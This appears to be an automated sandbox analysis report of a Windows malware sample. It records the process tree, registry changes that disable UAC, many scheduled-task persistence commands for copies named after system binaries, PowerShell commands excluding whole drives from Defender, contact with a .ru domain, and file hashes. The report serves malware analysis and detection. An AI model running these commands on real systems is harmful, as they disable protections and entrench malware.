PID 1740 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\cmd.exe
PID 1740 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\cmd.exe
PID 1740 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\cmd.exe
PID 2040 wrote to memory of 1460 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2040 wrote to memory of 1460 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2040 wrote to memory of 1460 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2040 wrote to memory of 2868 N/A C:\Windows\System32\cmd.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2040 wrote to memory of 2868 N/A C:\Windows\System32\cmd.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2040 wrote to memory of 2868 N/A C:\Windows\System32\cmd.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2868 wrote to memory of 2264 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2868 wrote to memory of 2264 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2868 wrote to memory of 2264 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2868 wrote to memory of 1656 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2868 wrote to memory of 1656 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2868 wrote to memory of 1656 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2264 wrote to memory of 2880 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2264 wrote to memory of 2880 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2264 wrote to memory of 2880 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2880 wrote to memory of 2008 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2880 wrote to memory of 2008 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2880 wrote to memory of 2008 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2880 wrote to memory of 2484 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2880 wrote to memory of 2484 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2880 wrote to memory of 2484 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe
PID 2008 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2008 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2008 wrote to memory of 2156 N/A C:\Windows\System32\WScript.exe C:\Program Files\Windows Journal\ja-JP\smss.exe
PID 2156 wrote to memory of 2120 N/A C:\Program Files\Windows Journal\ja-JP\smss.exe C:\Windows\System32\WScript.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Windows Journal\ja-JP\smss.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe

"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Documents\My Music\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Music\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Documents\My Music\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafNf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafNf" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Photo Viewer\en-US\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-US\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Journal\ja-JP\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Journal\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0EpYUV7rVf.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\65d9c934-ccb1-46d4-ad81-cc05d426e2fb.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d0b27f55-043d-44d8-bb49-edac62daf534.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ab0385af-7c65-4dd9-9fc7-3ce605066610.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cbcca2ed-7ea8-467a-9075-05d3d0b2c47b.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\37ce2d55-a30d-469a-b78d-d3f50b81ccab.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f65ebb41-f330-4227-a4db-dd87b85b1d37.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e0801a69-6fb7-4a78-b405-de19841e11a0.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ffcb7729-47d1-461b-b79e-fb0db12ec5e6.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e88acb5f-586f-432c-9bb6-a9335c637174.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4dd443ab-e86b-4fa4-aec4-72e66919eb98.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\607d0094-c8cf-45b0-a489-eb60253042bd.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dd9e8af2-4281-4529-8c47-352fa3587877.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\eb67a883-7167-4851-8475-59ffe31fb9ca.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8bb3d616-48aa-44cb-92b7-bd0a22c819a2.vbs"

C:\Program Files\Windows Journal\ja-JP\smss.exe

"C:\Program Files\Windows Journal\ja-JP\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d00a8001-25b8-4121-bf98-8ef2d7936fa1.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5269eb75-89ae-4f06-8216-f2ef54d4355d.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 81888.cllt.nyashteam.ru udp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp
US 104.21.2.8:80 81888.cllt.nyashteam.ru tcp

Files

memory/1740-0-0x000007FEF5A63000-0x000007FEF5A64000-memory.dmp

memory/1740-1-0x0000000000220000-0x0000000000714000-memory.dmp

memory/1740-2-0x000000001B570000-0x000000001B69E000-memory.dmp

memory/1740-3-0x000007FEF5A60000-0x000007FEF644C000-memory.dmp

memory/1740-4-0x0000000000990000-0x00000000009AC000-memory.dmp

memory/1740-5-0x00000000009B0000-0x00000000009B8000-memory.dmp

memory/1740-6-0x0000000000BD0000-0x0000000000BE0000-memory.dmp

memory/1740-7-0x0000000000BE0000-0x0000000000BF6000-memory.dmp

memory/1740-8-0x0000000000C00000-0x0000000000C10000-memory.dmp

memory/1740-9-0x0000000000C10000-0x0000000000C1A000-memory.dmp

memory/1740-10-0x0000000002330000-0x0000000002342000-memory.dmp

memory/1740-11-0x0000000002340000-0x000000000234A000-memory.dmp

memory/1740-12-0x0000000002350000-0x000000000235E000-memory.dmp

memory/1740-13-0x0000000002360000-0x000000000236E000-memory.dmp

memory/1740-14-0x0000000002370000-0x0000000002378000-memory.dmp

memory/1740-15-0x0000000002380000-0x0000000002388000-memory.dmp

memory/1740-16-0x0000000002410000-0x000000000241C000-memory.dmp

C:\Program Files (x86)\Common Files\microsoft shared\Portal\1033\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe

MD5 362ac52b63b9f6608733e6da0f41b8a0
SHA1 4351bcc1035d37bc58f641fb58b08f80949f9129
SHA256 f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcaf
SHA512 8f60c2beb708deef5de53c33ee8224456ac9d9a7e3ad1eeacd786b79f2511342626910d5653b6870ea2a8c5448f6ca46ca6cfa09adb0ed1407812e7522771203

memory/1740-96-0x000007FEF5A63000-0x000007FEF5A64000-memory.dmp

memory/1740-110-0x000007FEF5A60000-0x000007FEF644C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bbedad7ca0fa5a572e119667e15e8584
